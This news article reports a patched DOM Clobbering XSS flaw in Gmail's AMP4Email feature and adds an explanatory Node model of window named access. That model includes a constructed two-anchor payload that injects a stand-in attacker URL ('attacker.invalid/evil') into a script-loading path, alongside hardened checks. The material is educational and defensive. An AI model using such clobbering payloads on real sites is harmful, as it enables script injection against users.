Google has recently patched a serious XSS vulnerability in Gmail's dynamic email feature. The researcher who found it describes it as a real-world example of DOM Clobbering.
XSS Vulnerability In Gmail Dynamic Email Feature
In a blog post, security researcher Michał Bentkowski has shared his discovery of an XSS vulnerability in Gmail.
The flaw existed in Gmail's AMP4Email feature. Also known as 'Dynamic Mail', it lets an email display dynamic HTML content, such as threads or events.
Google built the feature with XSS in mind: AMP4Email validates dynamic mail against a whitelist of allowed tags and attributes, so an attacker cannot introduce any HTML element or attribute that the validator has not explicitly permitted.
However, the researcher found that the validator did not block the id attribute. That is exactly the precondition for DOM Clobbering, because an element's id decides which global name it shadows.
About DOM Clobbering
Describing the issue, the researcher wrote:
Basically, when you create an element in HTML (for instance <input id=username>) and then you wish to reference it from JavaScript, you would usually use a function like document.getElementById('username') or document.querySelector('#username'). But these are not the only ways!
The legacy way is to just access it via a property of global window object. So window.username is in this case exactly the same as document.getElementById('username')! This behaviour (which is known as DOM Clobbering) can lead to interesting vulnerabilities if the application makes decisions based on existence of certain global variables (imagine: if (window.isAdmin) { … }).
DOM Clobbering And AMP4Email
He found that AMP4Email's validator already rejected some id values, but an id of AMP_MODE was not among them, and AMP's own runtime reads properties from a global of that name. Here is what he noticed when he prepared a test payload:
AMP4Email tries to load a certain JS file and fails to do so because of 404. What is particularly eye-catching, however, is the fact that there's undefined in the middle of the URL… AMP tries to get a property of AMP_MODE to put it in the URL. Because of DOM Clobbering, the expected property is missing, hence undefined.
So the value spliced into that URL came from a property of AMP_MODE, and AMP_MODE itself could be clobbered from the email's HTML. With the right element in place of the expected property, the researcher was able to control the full URL of the script that AMP loaded, which is what turns a missing property into script execution.
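The researcher's explanation above and the AMP_MODE failure it led to, as an added example that is not code from the article, from the researcher, or from AMP/Gmail. It is a small model of the HTML rule "named access on the Window object" (declared globals are own properties of window and win; otherwise elements are looked up by id, giving one element or an HTMLCollection), written so it runs under Node without a real DOM. It shows the vulnerable `if (window.isAdmin)` style check beside a hardened one, and a hypothetical script-URL builder that reproduces the `undefined` the researcher saw and then the attacker-controlled value. `buildScriptUrl`, `runtimeVersion`, the `cdn.example.invalid` and `attacker.invalid` hosts and the markup records are all constructed for this example; `AMP_MODE` is the only name taken from the article.

```javascript
// Added example, not from the article or from AMP/Gmail. A model of the HTML
// "named access on the Window object" rule behind DOM Clobbering, written so
// it runs under Node: elements are plain records and a Proxy plays `window`.
// In a browser the same results come from document.body.innerHTML = markup
// followed by reading window.<id> directly.

class Element {
  constructor(tag, attrs) {
    this.tag = tag;
    this.id = attrs.id || '';
    this.name = attrs.name || '';
    this.href = attrs.href || '';
  }
  // HTMLAnchorElement stringifies to its href; that is how a clobbered value
  // survives string concatenation into a URL.
  toString() { return this.tag === 'a' ? this.href : '[object HTMLElement]'; }
}

// HTMLCollection named access: first element whose id or name matches.
function makeCollection(matches) {
  return new Proxy(matches, {
    get(target, prop) {
      if (prop in target) return target[prop]; // length, indices, array methods
      if (typeof prop !== 'string') return undefined;
      return target.find((el) => el.id === prop || el.name === prop);
    },
  });
}

// Only these tags also expose their name attribute on window.
const NAME_EXPOSING = new Set(['embed', 'form', 'img', 'object']);

// Window named access. Declared globals (own properties of window) take
// precedence, which is why only undeclared or unset globals are clobberable.
// Otherwise: no match -> undefined, one -> the element, several -> collection.
function makeWindow(elements, globals = {}) {
  return new Proxy(globals, {
    get(target, prop) {
      if (Object.prototype.hasOwnProperty.call(target, prop)) return target[prop];
      if (typeof prop !== 'string') return undefined;
      const matches = elements.filter(
        (el) => el.id === prop || (NAME_EXPOSING.has(el.tag) && el.name === prop),
      );
      if (matches.length === 0) return undefined;
      if (matches.length === 1) return matches[0];
      return makeCollection(matches);
    },
  });
}

// The pattern from the researcher's quote: deciding on the existence of a
// global. Any element is truthy, so <a id=isAdmin> passes.
function vulnerableIsAdmin(win) {
  return Boolean(win.isAdmin);
}

// Hardened: demand the type you expect; a clobbered value is never a boolean.
function hardenedIsAdmin(win) {
  return win.isAdmin === true;
}

// Hypothetical stand-in for the loader behaviour the article describes (not
// AMP's real code): a property of AMP_MODE is spliced into a script URL.
function buildScriptUrl(win) {
  return 'https://cdn.example.invalid/rtv/' + win.AMP_MODE.runtimeVersion + '/v0/component.js';
}

// Hardened loader: validate the shape of what goes into the URL. A clobbered
// AMP_MODE yields undefined or an element here, never a version string.
function buildScriptUrlSafe(win) {
  const mode = win.AMP_MODE;
  const version = mode == null ? undefined : mode.runtimeVersion;
  if (typeof version !== 'string' || !/^[0-9]{1,32}$/.test(version)) {
    throw new Error('AMP_MODE.runtimeVersion missing or not a version string');
  }
  return 'https://cdn.example.invalid/rtv/' + version + '/v0/component.js';
}

// Constructed markup, as element records. NESTED_CLOBBER is the two-<a> trick:
// duplicate ids produce a collection, and the collection resolves
// `runtimeVersion` to the anchor carrying that name, whose href is the value.
const SINGLE_CLOBBER = [
  new Element('a', { id: 'AMP_MODE' }),
  new Element('a', { id: 'isAdmin' }),
];
const NESTED_CLOBBER = [
  new Element('a', { id: 'AMP_MODE' }),
  new Element('a', { id: 'AMP_MODE', name: 'runtimeVersion', href: 'https://attacker.invalid/evil' }),
];

function demo() {
  const normal = makeWindow([], { AMP_MODE: { runtimeVersion: '2019111800' } });
  const single = makeWindow(SINGLE_CLOBBER);
  const nested = makeWindow(NESTED_CLOBBER);
  return {
    normalUrl: buildScriptUrl(normal),
    singleUrl: buildScriptUrl(single), // the "undefined" in the middle of the URL
    nestedUrl: buildScriptUrl(nested), // attacker-chosen string spliced in
    vulnAdmin: vulnerableIsAdmin(single),
    safeAdmin: hardenedIsAdmin(single),
    declaredWins: vulnerableIsAdmin(makeWindow(SINGLE_CLOBBER, { isAdmin: false })),
  };
}

console.log(demo());
```

Run it with `node`. The `declaredWins` case is the caveat that matters in practice: a global the page itself declares or initialises (`var isAdmin = false`) is an own property of window and cannot be shadowed by an element, so clobbering only bites on names that code reads but never sets. The `nested` case shows why a tag whitelist alone is not enough: two `<a>` elements are harmless on their own, yet together they hand the application an attacker-chosen string through a property read. It is the attribute values (id, and name on the tags that expose it) that have to be constrained, and the consuming code should type-check what it reads, as `buildScriptUrlSafe` does.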
Patch Rolled Out
Upon finding the bug, he reported it to Google via the Google Vulnerability Reward Program in August. Google promptly acknowledged his discovery and confirmed the bug.
Soon after, Google fixed the flaw, which its team called 'awesome'. Full exploit details are in the researcher's write-up.